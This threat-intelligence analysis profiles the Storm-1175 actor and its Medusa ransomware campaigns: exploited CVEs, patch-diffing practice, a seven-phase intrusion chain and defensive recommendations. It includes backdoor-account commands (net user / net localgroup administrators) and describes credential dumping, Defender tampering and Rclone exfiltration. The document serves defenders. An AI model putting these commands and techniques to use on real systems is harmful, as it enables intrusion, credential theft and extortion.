Storm-1175 and Medusa Ransomware: Anatomy of a High-Velocity Attack
Storm-1175 and Medusa Ransomware Analysis
Who is Storm-1175?
Storm-1175 is a financially motivated cybercriminal actor, with links attributed to China by external researchers, that runs ransomware campaigns against organizations with exposed perimeter assets. Its defining characteristic is not the sophistication of its tools —many of which are commercial or open-source— but rather the speed with which it converts vulnerabilities into operational access.
On April 6th, Microsoft Threat Intelligence documented that the actor deploys ransomware within windows of 24 hours to 5 days after initial access, a pace that invalidates any patching SLA based on weekly or bi-weekly cycles. In at least two recent cases (CVE-2025-10035 and CVE-2026-23760), Storm-1175 exploited vulnerabilities one week before their public disclosure, suggesting access to exploit development capabilities or pre-disclosure exploit markets.
Storm-1175 Profile
Storm-1175 is the tracking designation assigned by Microsoft Threat Intelligence to a financially motivated threat actor with attributed links to China. Its documented activity spans from 2023 to the date of this analysis, with a consistent focus on organizations in the healthcare, education, professional services, and finance sectors in Australia, the United Kingdom, and the United States.
| Attribute | Description |
|---|---|
| Designation | Storm-1175 |
| Motivation | Financial (ransomware, double extortion) |
| Attributed origin | China (third-party analysis) |
| Active since | At least 2023 |
| Deployed ransomware | Medusa (RaaS) |
| Target sectors | Healthcare, Education, Professional Services, Finance |
| Affected geographies | Australia, United Kingdom, United States |
| Compromise velocity | 24 hours – 5 days (initial access → payload deployment) |
Medusa ransomware operates under a Ransomware-as-a-Service (RaaS) model: its developers provide the infrastructure and payload, while affiliates contribute the intrusion capabilities. Storm-1175 became the star affiliate of the Medusa ecosystem by bringing something previous Medusa attacks lacked: mass data exfiltration. Before Storm-1175, Medusa attacks were limited to encryption. Its incorporation transformed operations into double extortion campaigns, where the threat of public leakage on Medusa’s Dark Web Data Leak Site (DLS) adds a second layer of pressure on victims.
From Broker to Operator
Available indicators suggest Storm-1175 began operating as an Initial Access Broker (IAB): a specialist in obtaining and selling credentials or initial footholds in corporate networks. This function requires exactly the capabilities that characterize it: massive attack surface scanning, rapid N-day exploitation, and management of multiple access vectors simultaneously.
The transition to the role of Medusa affiliate operator expanded its scope. Storm-1175 now not only gains access, but executes the full chain through encryption and exfiltration, enabling the double extortion model characteristic of Medusa’s RaaS:
- Primary extortion: Encryption of the production environment, with a ransom demand for delivery of the decryption key.
- Secondary extortion: Mass exfiltration prior to encryption. Stolen data is published on Medusa’s leak site if the victim does not pay within the established deadline.
This combination significantly increases pressure on victim organizations: even those with functional backups must negotiate to prevent the exposure of sensitive data.
Exploitation Inventory: N-Day and Zero-Day
Documented Vulnerability Table
According to Microsoft Threat Intelligence, since 2023 Storm-1175 has exploited more than 16 vulnerabilities in web-facing systems:
| CVE | Platform / Product | Type | Exploitation Window |
|---|---|---|---|
| CVE-2023-21529 | Microsoft Exchange Server | N-day | Days post-disclosure |
| CVE-2022-41080 | Microsoft Exchange (OWASSRF) | N-day | Chained with CVE-2022-41082 |
| CVE-2022-41082 | Microsoft Exchange (OWASSRF) | N-day | Chained with CVE-2022-41080 |
| CVE-2023-27350 | PaperCut NG/MF | N-day | Days post-disclosure |
| CVE-2023-27351 | PaperCut NG/MF | N-day | Days post-disclosure |
| CVE-2023-46805 | Ivanti Connect Secure / Policy Secure | N-day | Days post-disclosure |
| CVE-2024-21887 | Ivanti Connect Secure / Policy Secure | N-day | Chained with CVE-2023-46805 |
| CVE-2024-1709 | ConnectWise ScreenConnect | N-day | < 48 hours post-disclosure |
| CVE-2024-1708 | ConnectWise ScreenConnect | N-day | < 48 hours post-disclosure |
| CVE-2024-27198 | JetBrains TeamCity | N-day | Days post-disclosure |
| CVE-2024-27199 | JetBrains TeamCity | N-day | Days post-disclosure |
| CVE-2024-57726 | SimpleHelp RMM | N-day | Days post-disclosure |
| CVE-2024-57727 | SimpleHelp RMM | N-day | Days post-disclosure |
| CVE-2024-57728 | SimpleHelp RMM | N-day | Days post-disclosure |
| CVE-2025-31161 | CrushFTP | N-day | Days post-disclosure |
| CVE-2025-31324 | SAP NetWeaver | N-day | ~24 hours post-disclosure |
| CVE-2025-10035 | Fortra GoAnywhere MFT | Zero-Day | 1 week before disclosure |
| CVE-2026-23760 | SmarterTools SmarterMail | Zero-Day | 1 week before disclosure |
| CVE-2026-1731 | BeyondTrust | N-day | Days post-disclosure |
| Oracle WebLogic (no CVE identified) | Oracle WebLogic (Linux) | Unidentified | Late 2024 |
The exploitation of CVE-2025-31324 (SAP NetWeaver) in less than 24 hours from its disclosure on April 24, 2025, represents the most extreme case of rapid weaponization documented for this actor. This implies that Storm-1175 maintains continuous monitoring of security advisories and automated patch analysis pipelines to develop functional proof-of-concept exploits in hours, not days.
Patch Diffing Analysis: Reverse Engineering as an Exploitation Accelerator
The group has a documented patch diffing process: reverse engineering security patches as soon as they are released by vendors. By comparing the binary before and after the patch, it is possible to identify exactly what code was corrected and, therefore, what the vulnerability was. This process allows them to create functional exploits within hours of disclosure, before most organizations have even started their monthly patching cycle.
The typical process follows this sequence:
- Security bulletin monitoring (NVD, CISA KEV, vendor advisories) to identify critical disclosures.
- Immediate download of the patched version and the vulnerable version of the software.
- Differential analysis using tools such as BinDiff, Diaphora, or static analysis with IDA Pro / Ghidra.
- Exploit development based on the understanding of the attack vector revealed by the diff.
- Active scanning of the internet to identify instances still unpatched.
In the case of CVE-2026-23760 (SmarterMail), watchTowr researchers identified that the new zero-day vulnerability exploited by Storm-1175 was similar in structure to a previously patched flaw in the same product —a pattern known as variant hunting.
Intrusion Anatomy
Phase 1 — Initial Access
Storm-1175 gains initial access exclusively through exploitation of web-facing applications with known (N-day) and unknown (zero-day) vulnerabilities: MFT systems, mail servers, exposed RMM tools, and enterprise collaboration platforms. After successful exploitation, it deploys a web shell or a lightweight remote access payload.
Phase 2 — Persistence and Privilege Escalation
The actor creates a new local user account and immediately adds it to the administrators group:
net user [account_name] [password] /add
net localgroup administrators [account_name] /add
This account functions as an administrative backdoor independent of the initial access vector, guaranteeing operational continuity even if the web shell is detected and removed.
Phase 3 — Reconnaissance and Lateral Movement
Storm-1175 employs a hybrid set of tools for lateral movement:
Documented LOLBins: PowerShell, PsExec, net.exe.
RMM tools used: Atera RMM, N-able, Level RMM, DWAgent, MeshAgent, ConnectWise ScreenConnect, AnyDesk, SimpleHelp.
Covert tunneling: A particularly relevant TTP is the use of Cloudflare Tunnel (cloudflared.exe) renamed to mimic legitimate operating system binaries, such as conhost.exe. This binary establishes an encrypted tunnel toward Cloudflare’s infrastructure, used for pivoting via RDP and delivery of additional payloads. If RDP is blocked, Storm-1175 explicitly enables it by modifying Windows Firewall rules via netsh commands.
Mass deployment: PDQ Deployer, a legitimate enterprise software deployment tool, is repurposed both for lateral movement and for the final ransomware delivery.
Phase 4 — Credential Theft
Storm-1175 implements multiple credential extraction techniques:
- LSASS Memory Dump: Dumping of the
lsass.exeprocess via Task Manager or Impacket. - Mimikatz: Identified in 2025 intrusions for WDigest credential extraction.
- WDigest Cache Activation: Modification of
HKLM\SYSTEM\...\WDigest\UseLogonCredentialto force caching of plaintext credentials. - NTDS.dit extraction: From a compromised Domain Controller, Storm-1175 extracts the
NTDS.ditfile, which contains the hashes of all Active Directory domain accounts. - Veeam Credential Extraction: Specialized script to retrieve credentials stored in the Veeam backup software, used directly for ransomware deployment.
- SAM hive extraction: Extraction of the Security Account Manager for local account credentials.
Phase 5 — Defense Evasion
- Windows Defender registry modification: Alteration of keys that control Microsoft Defender Antivirus configuration.
- Antivirus exclusions via PowerShell: Addition of the entire
C:\drive to exclusions using Base64-encoded PowerShell commands.
Phase 6 — Exfiltration
Exfiltration occurs before encryption, enabling double extortion:
- Bandizip: Data packaging and compression prior to transfer.
- Rclone (renamed as
lsp.exe): Data synchronization toward attacker-controlled cloud storage. Rclone can operate in continuous synchronization mode, exfiltrating data in real time without manual operator interaction.
Phase 7 — Impact (Ransomware Deployment)
Medusa ransomware deployment is carried out via two mechanisms:
- PDQ Deployer + RunFileCopy.cmd: Script that delivers the Medusa payload to all reachable hosts on the network.
- Group Policy Object (GPO): When Storm-1175 has compromised a Domain Controller, it creates or modifies a GPO to deploy ransomware simultaneously across all domain systems.
Storm-1175’s profile allows controls to be clearly prioritized: since its entry vector is always the perimeter and its weapon is speed, preventive measures have a far superior return compared to reactive ones.
1. Perimeter patching in windows of hours, not days. For any CVE listed in the CISA KEV catalog affecting web-facing software, the target must be to apply the patch in less than 72 hours. The group has weaponized exploits in less than 24 hours after disclosure.
2. Continuous attack surface visibility. Implement External Attack Surface Management (EASM) tools to know which assets are exposed to the Internet before Storm-1175 finds them. You cannot protect what you do not know exists.
3. Real isolation of perimeter systems. Web-facing servers behind a WAF, reverse proxy, or DMZ, with no direct access to the internal network. This control alone does not stop the group, but it forces lateral movement to be detectable.
4. Strict control of RMM tools. Whitelist of authorized remote administration tools, with automatic alerts on any out-of-inventory installation. Unauthorized AnyDesk or SimpleHelp on a server is a signal of active compromise.
5. Credential Guard enabled and verified. Protects credentials stored in LSASS against dumping. Active by default in Windows 11 but must be verified in existing environments, especially before joining new devices to the domain.
6. Tamper Protection + DisableLocalAdminMerge. Prevents attackers with local administrator privileges from disabling the antivirus or configuring exclusions via GPO. Without this control, the group can neutralize endpoint defenses without escalating domain privileges.
7. Phishing-resistant MFA on privileged accounts. Credential theft is central to the attack chain. FIDO2 on domain administrator accounts significantly limits the post-compromise radius of action, even if the group manages to dump NTDS.dit.
8. Segmentation and active monitoring of RDP. RDP disabled by default on the internal network, with alerts on firewall policy modifications. Storm-1175 actively enables RDP when it is unavailable; that policy modification is a high-relevance alert signal that occurs before encryption.
References
- Microsoft Threat Intelligence — Storm-1175 focuses gaze on vulnerable web-facing assets (April 6, 2026)
- The Hacker News — China-Linked Storm-1175 Exploits Zero-Days to Rapidly Deploy Medusa Ransomware
- Dark Reading — Storm-1175, Medusa Ransomware, High Velocity
- CybersecurityNews — Microsoft Warns Storm-1175 Exploits Web-Facing Assets 0-Day Flaws
- CyberDefensa.mx — Storm-1175 vinculada a China aprovecha los días cero